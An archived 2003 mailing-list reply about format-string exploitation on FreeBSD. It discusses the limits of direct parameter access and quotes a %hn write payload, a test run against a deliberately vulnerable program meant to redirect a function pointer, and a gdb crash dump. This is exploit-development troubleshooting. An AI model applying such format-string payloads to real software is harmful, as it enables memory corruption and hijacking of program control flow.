Hosting Provided By

Re: Formatstrings on *BSD

From: The Itch <itchie(at)netric.org>
Date: Sat Jun 21 2003 - 14:23:48 EDT

You can't use direct popping or writing (%number$x) on *BSD (well only till 8 pops/writes maximum)
I dont know why this behaviour is on BSD, but it is. On linux you can have a a direct pop/write as far as you wont.

(in your example you used %9$x)

--
-

The Itch
    -- 
http://www.netric.org

----- Original Message -----
From: "Ingram" 
To: 
Sent: Friday, June 20, 2003 10:07 AM
Subject: Re: Formatstrings on *BSD

> >>[%.-16457x%8$hn%.15261x%9$hn] (35)

> >>

> >^---- first question is your input still at %8$x and %9$x on the bsd box?
>
> yep, see here:
>
> > uname
> FreeBSD
> > ./vuln AAAABBBB%x%x%x%x%x%x%x%x%x
> 0 0xbfbffccc
> 1 0xbfbffcd3
> helloWorld() = 0x8048770
> accessForbidden() = 0x80487a0
>
> before : ptrf() = 0x8048770 (0xbfbffad8)
> buffer =
> [AAAABBBB2805f00022806dfe4105b6cc2805f100bfbffb1480487704141414142424242]
(71)
> after : ptrf() = 0x8048770 (0xbfbffad8)
> Welcome in "helloWorld"
>
>

> >>...

> >>Segmentation fault (core dumped)

> >>

> >^---- second ... what does the bt look like in gdb...
>
> here we go, the fmt seems to corrupt eax
>
> > gdb -core vuln.core
> GNU gdb 4.18
> .
> .
> .
> This GDB was configured as "i386-unknown-freebsd".
> Core was generated by `vuln'.
> Program terminated with signal 11, Segmentation fault.
> #0  0x40517d31 in ?? ()
> (gdb) bt
> #0  0x40517d31 in ?? ()
> #1  0x8048805 in ?? ()
> #2  0x8048767 in ?? ()
> #3  0x8048561 in ?? ()
> (gdb) i reg
> eax            0x40517d31       1079082289
> ecx            0x8049a70        134519408
> edx            0x280e9968       672045416
> ebx            0x280e8424       672039972
> esp            0xbfbffad4       0xbfbffad4
> ebp            0xbfbffae0       0xbfbffae0
> esi            0x1      1
> edi            0x280e9960       672045408
> eip            0x40517d31       0x40517d31
> eflags         0x10216  66070
> cs             0x1f     31
> ss             0x2f     47
> ds             0x2f     47
> es             0x2f     47
> fs             0x2f     47
> gs             0x2f     47
> (gdb) x/1x $eax
> 0x40517d31:     Cannot access memory at address 0x40517d31.
>
>
> kind regards
Do you need help? 
In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software:Learn more about Pantek's Technical Support offerings
Place an order for 24/7/365 Technical Support here
Learn more about Pantek, who we are, and what we do
Chat with a Live Operator
Related securityfocus.com Links
bugtraq
certification
focus-bsd
focus-ids
focus-ih
focus-linux
focus-ms
focus-sun
focus-unix-other
focus-virus
forensics
incidents
libnet
linux-secnews
ms-secnews
pen-test
secpapers
secprog
sectools
secureshell
security-basics
securityjobs
sf-news
vuln-dev
webappsec
Request more information about Pantek
> Ingram
>
> --
> +++ GMX - Mail, Messaging & more  
http://www.gmx.net +++
> Bitte lächeln! Fotogalerie online mit GMX ohne eigene Homepage!
>
>
>

Received on Sat Jun 21 23:53:18 2003

This message: [ Message body ]
Next message: eip(at)oakey.no-ip.com: "Myserver 0.4.1 DOS..."
Previous message: Ingram: "Re: Formatstrings on *BSD"
In reply to: Ingram: "Re: Formatstrings on *BSD"
In reply to Vail(at)gmx.net: "Formatstrings on *BSD"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT